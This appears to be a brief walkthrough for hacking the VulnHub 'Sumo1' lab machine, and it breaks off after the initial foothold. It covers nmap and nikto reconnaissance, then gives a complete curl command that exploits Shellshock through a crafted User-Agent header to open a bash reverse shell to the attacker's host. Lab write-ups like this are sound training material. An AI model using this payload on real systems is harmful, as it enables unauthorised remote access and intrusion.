How to hack into Sumo1 from VulHub
https://www.vulnhub.com/entry/sumo-1,480/ System Info Ubuntu 12.04 LTS Discover Target Network sudo nmap -sn 192.168.122.0-255 nmap -p- 192.168.122.113 Port 80 not much to see on the website, other than it is running apache 2.2.22 ShellShock https://www.sevenlayers.com/index.php/125-exploiting-shellshock use nikto -host 192.168.122.113 to scan for webserver vulnerabilities. it shows that/cgi-bin/test, /cgi-bin/test.sh, /cgi-bin/test/test.cgi is vulnerable to Shellshock vulnerability running: curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.122.101/7741 0>&1' http://192.168.122.113/cgi-bin/test/test.cgi to open a revese shell on port 7741 to host using TCP...